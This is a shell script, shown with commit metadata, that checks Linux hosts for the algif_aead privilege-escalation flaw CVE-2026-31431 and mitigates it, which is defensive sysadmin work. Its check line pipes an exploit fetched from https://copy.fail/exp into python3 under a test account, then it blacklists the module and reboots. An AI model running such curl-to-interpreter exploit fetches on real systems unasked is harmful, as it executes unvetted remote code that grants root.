sysmisc/fix-copy-fail.sh
corwin 12a47659f7 reference website, add set -x
Thanks to #emacs user kiliro for suggesting it would be wise to mention https://copy.fail in the script that detects and attempts to patch for it.  Change will add some meaningful top-natter, improve other comments, say thanks, enable command logging while the script runs.
2026-04-30 13:45:36 -05:00

57 lines
2.4 KiB
Bash

#!/usr/bin/sh
# fix-copy-fail.sh - harden vs CVE-2026-31431, see: https://copy.fail
# Copyright (c) 2026 Corwin Brust <corwin@bru.st>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
#
# According to the website https://copy.fail (20262431@1pZ-5)
# CVE-2026-31431 enables privilege escalation via exploitation
# of a defect in the Linux kernel intended to support a rarely
# used (but typically enabled) kernel module, "algif_aead".
#
# This script grew from walking several dozen apt(1) virtual machines
# and benefited greatly from "peer" review and/or comments from the
# FSF SYSOPS, irc://libera.chat/#emacs and other nerds/activists. thx
#
# more output. output is good.
set -x
# Delete the test user if it exists
# (passwd fields are colon-separated, so match "testu:")
grep '^testu:' /etc/passwd && deluser testu;
# NOTE: this makes the script repeatable however
# it will still abandon the 'testu' account
#
# To remove the test account after patching:
# deluser testu
#
# Note this may not work all in one shot
# due to the exploit screwing with the kernel
# usermap resident in memory.
# Create an unprivileged test user, run the script served at
# https://copy.fail/exp as that user, and treat "root" in the id output
# as a detection. Every step is chained, so each line needs its backslash.
adduser --disabled-password --gecos='""' testu \
&& su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root \
&& echo "EXPLOIT DETECTED: copy.fail FFI, please see: https://copy.fail" \
&& echo \
&& echo "The system MUST be restarted before confirming the fix." \
&& echo "If changes are made this should happen automatically but do it manually if that fails." \
&& echo \
&& echo "Pausing for ten seconds before attempting to fix.." \
&& sleep 10 \
&& echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf \
&& rmmod algif_aead \
&& apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y && shutdown -r now \
|| printf '%s\n' "Check halted: check above for error messages." \
"If the only error message you see is from grep you patched for copy.fail."